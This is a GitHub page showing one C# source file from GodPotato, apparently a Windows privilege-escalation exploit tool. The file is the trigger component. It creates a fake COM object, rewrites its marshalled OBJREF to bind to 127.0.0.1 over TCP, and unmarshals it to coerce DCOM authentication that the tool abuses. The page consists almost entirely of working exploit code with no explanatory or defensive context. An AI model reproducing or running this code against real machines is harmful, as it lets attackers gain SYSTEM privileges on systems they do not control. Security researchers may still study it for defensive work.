-
Notifications
You must be signed in to change notification settings - Fork 210
/
GodPotatoUnmarshalTrigger.cs
69 lines (47 loc) · 2.81 KB
/
GodPotatoUnmarshalTrigger.cs
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
using System;
using System.Runtime.InteropServices;
using System.Runtime.InteropServices.ComTypes;
namespace GodPotato.NativeAPI{
[ComVisible(true)]
public class GodPotatoUnmarshalTrigger {
private readonly static Guid IID_IUnknown = new Guid("{00000000-0000-0000-C000-000000000046}");
private readonly static string binding = "127.0.0.1";
private readonly static TowerProtocol towerProtocol = TowerProtocol.EPM_PROTOCOL_TCP;
public object fakeObject = new object();
public IntPtr pIUnknown;
public IBindCtx bindCtx;
public IMoniker moniker;
private GodPotatoContext godPotatoContext;
public GodPotatoUnmarshalTrigger(GodPotatoContext godPotatoContext) {
this.godPotatoContext = godPotatoContext;
if (!godPotatoContext.IsStart)
{
throw new Exception("GodPotatoContext was not initialized");
}
pIUnknown = Marshal.GetIUnknownForObject(fakeObject);
NativeMethods.CreateBindCtx(0, out bindCtx);
NativeMethods.CreateObjrefMoniker(pIUnknown, out moniker);
}
public int Trigger() {
string ppszDisplayName;
moniker.GetDisplayName(bindCtx, null, out ppszDisplayName);
ppszDisplayName = ppszDisplayName.Replace("objref:", "").Replace(":", "");
byte[] objrefBytes = Convert.FromBase64String(ppszDisplayName);
ObjRef tmpObjRef = new ObjRef(objrefBytes);
godPotatoContext.ConsoleWriter.WriteLine($"[*] DCOM obj GUID: {tmpObjRef.Guid}");
godPotatoContext.ConsoleWriter.WriteLine($"[*] DCOM obj IPID: {tmpObjRef.StandardObjRef.IPID}");
godPotatoContext.ConsoleWriter.WriteLine("[*] DCOM obj OXID: 0x{0:x}", tmpObjRef.StandardObjRef.OXID);
godPotatoContext.ConsoleWriter.WriteLine("[*] DCOM obj OID: 0x{0:x}", tmpObjRef.StandardObjRef.OID);
godPotatoContext.ConsoleWriter.WriteLine("[*] DCOM obj Flags: 0x{0:x}", tmpObjRef.StandardObjRef.Flags);
godPotatoContext.ConsoleWriter.WriteLine("[*] DCOM obj PublicRefs: 0x{0:x}", tmpObjRef.StandardObjRef.PublicRefs);
ObjRef objRef = new ObjRef(IID_IUnknown,
new ObjRef.Standard(0, 1, tmpObjRef.StandardObjRef.OXID, tmpObjRef.StandardObjRef.OID, tmpObjRef.StandardObjRef.IPID,
new ObjRef.DualStringArray(new ObjRef.StringBinding(towerProtocol, binding), new ObjRef.SecurityBinding(0xa, 0xffff, null))));
byte[] data = objRef.GetBytes();
godPotatoContext.ConsoleWriter.WriteLine($"[*] Marshal Object bytes len: {data.Length}");
IntPtr ppv;
godPotatoContext.ConsoleWriter.WriteLine($"[*] UnMarshal Object");
return UnmarshalDCOM.UnmarshalObject(data,out ppv);
}
}
}